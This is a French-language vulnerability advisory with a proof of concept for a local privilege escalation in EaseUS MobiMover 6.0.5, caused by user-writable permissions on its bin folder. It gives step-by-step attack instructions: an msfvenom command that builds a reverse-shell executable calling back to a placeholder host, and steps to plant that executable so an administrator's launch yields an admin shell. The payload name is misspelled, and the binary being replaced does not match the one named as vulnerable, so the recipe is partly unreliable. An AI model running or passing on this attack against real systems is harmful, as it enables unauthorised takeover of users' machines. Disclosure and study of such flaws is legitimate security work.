
EaseUS MobiMover 6.0.5 Build 21620 - Permissions de fichiers et dossiers non sécurisées
MobiMoverUILaunch.exe souffre d'une vulnérabilité d'élévation de privilèges qui peut être utilisée par un « Utilisateur authentifié » pour modifier le fichier exécutable du service avec un binaire de son choix dans le dossier bin. La vulnérabilité existe en raison d'un ensemble de permissions faibles accordées au « Groupe des utilisateurs authentifiés » qui accorde le drapeau (M) alias « Modify Privilege »

Page d'accueil du fournisseur : https://www.easeus.com/
Lien du logiciel : https://down.easeus.com/product/mobimover_trial_setup
Google Drive : https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
Vidéo POC : https://www.youtube.com/watch?v=FR4cQm-z4Gw
#PoC
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
FILE_ALL_ACCESS
RW NT SERVICE\TrustedInstaller
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
Créer un fichier binaire malveillant sur Kali Linux avec msfvenom
msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe
Transférer le fichier 'prepare.exe' créé depuis Kali vers l'hôte Windows en tant qu'utilisateur de bas niveau
Déplacer le fichier binaire 'prepare.exe' créé vers 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe' pour remplacer l'ancien en tant qu'utilisateur de bas niveau
Lorsque l'administrateur exécute l'application,vous obtiendrez un shell inverse en tant qu'administrateur